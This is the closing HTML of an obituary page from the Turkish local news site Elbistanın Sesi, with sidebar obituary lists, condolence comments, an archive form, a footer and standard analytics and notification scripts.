href="http://www.elbistaninsesi.com/guncel/oglunun-kazara-atesledigi-tufek-annesini-hayattan-kopardi-h68140.html" title="" ><span class="en-hit">5.</span> <strong>Oğlunun kazara ateşlediği tüfek,...</strong> <span class="en-spot en-hidden">Nurhak ilçesinde oğlunun kazara ateşlediği iddia edilen av tüfeğinden...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/mernus-yuce-h68321.html" title="Mernuş Yüce" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/mernus_yuce_h68321_525b0.jpg" alt="Mernuş Yüce"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mernus-yuce-h68321.html" title="" ><span class="en-hit">1.</span> <strong>Mernuş Yüce</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fahri-geyikli-57-yasinda-h68309.html" title="Fahri Geyikli 57 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/fahri_geyikli_57_yasinda_h68309_dc9df.jpg" alt="Fahri Geyikli 57 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fahri-geyikli-57-yasinda-h68309.html" title="" ><span class="en-hit">2.</span> <strong>Fahri Geyikli 57 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/seref-gunes-81-yasinda-h68148.html" title="Şeref Güneş 81 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/seref_gunes_81_yasinda_h68148_7cc02.jpg" alt="Şeref Güneş 81 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/seref-gunes-81-yasinda-h68148.html" title="" ><span class="en-hit">3.</span> <strong>Şeref Güneş 81 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-atasayar-95-yasinda-h68380.html" title="Mehmet Atasayar 95 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/mehmet_atasayar_95_yasinda_h68380_4ba41.jpg" alt="Mehmet Atasayar 95 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-atasayar-95-yasinda-h68380.html" title="" ><span class="en-hit">4.</span> <strong>Mehmet Atasayar 95 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mesut-karavul-67-yasinda-h68383.html" title="Mesut Karavul 67 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/11/mesut_karavul_67_yasinda_h68383_86354.jpg" alt="Mesut Karavul 67 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mesut-karavul-67-yasinda-h68383.html" title="" ><span class="en-hit">5.</span> <strong>Mesut Karavul 67 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/muharrem-sariyer-60-yasinda-h68382.html#comment_328335" title="" >canim babam Allah rahmet eylesin mekanin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/muharrem-sariyer-60-yasinda-h68382.html#comment_328334" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlit-bostanci-h68403.html#comment_328333" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/yunus-emre-ceyhan-12-yasinda-h68392.html#comment_328332" title="" >Değerli öğrencim Sinan Ceyhan&#39;ın...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-atasayar-95-yasinda-h68380.html#comment_328330" title="" >Kederli ailesine evlatlarına akraba ve...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlit-bostanci-h68403.html#comment_328329" title="" >Allah rahmet eylesin mekanı cennet olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bayram-polat-52-yasinda-h68400.html#comment_328328" title="" >Allah rahmet eylesin mekanı cennet olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hurmuz-yildiz-70-yasinda-h68340.html#comment_328325" title="" >Gece gündüz uyumadın Yanımızda hep...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hurmuz-yildiz-70-yasinda-h68340.html#comment_328324" title="" >Gece gündüz uyumadın Yanımızda hep...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/yunus-emre-ceyhan-12-yasinda-h68392.html#comment_328323" title="" >Yatti yer nurladolsun geride kalanlara sabir...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-ismet-karaca-h68393.html#comment_328322" title="" >ALLAH rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/omer-altun-75-yasinda-h68384.html#comment_328319" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismail-mert-88-yasinda-h68305.html#comment_328318" title="" >BAŞINIZ SAĞOLSUN ALLAHIM MEKANINI CENNET...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/halil-kahraman-80-yasinda-h68369.html#comment_328317" title="" >BAŞINIZ SAĞOLSUN ALLAHIM MEKANINI CENNET...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlit-bostanci-h68403.html#comment_328316" title="" >BAŞINIZ SAĞOLSUN ALLAHIM MEKANINI CENNET...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlit-bostanci-h68403.html#comment_328315" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/muharrem-sariyer-60-yasinda-h68382.html#comment_328314" title="" >ALLAH RAHMET EYLESİN BAŞINIZ SAĞOLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlit-bostanci-h68403.html#comment_328313" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fadime-agir-83-yasinda-h68347.html#comment_328312" title="" >Allah rahmet eylesin. Mekanı cennet olsun...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/musa-ozturk-60-yasinda-h68375.html#comment_328311" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" selected>19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" selected>Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="https://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="https://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Necib Sinan 92 yaşında" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="1a7f767873696e7b747374697f69737d7b607f6e7f69735a7d777b737634797577">[email&#160;protected]</a> <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fnecib-sinan-92-yasinda-h68407.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('68407', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 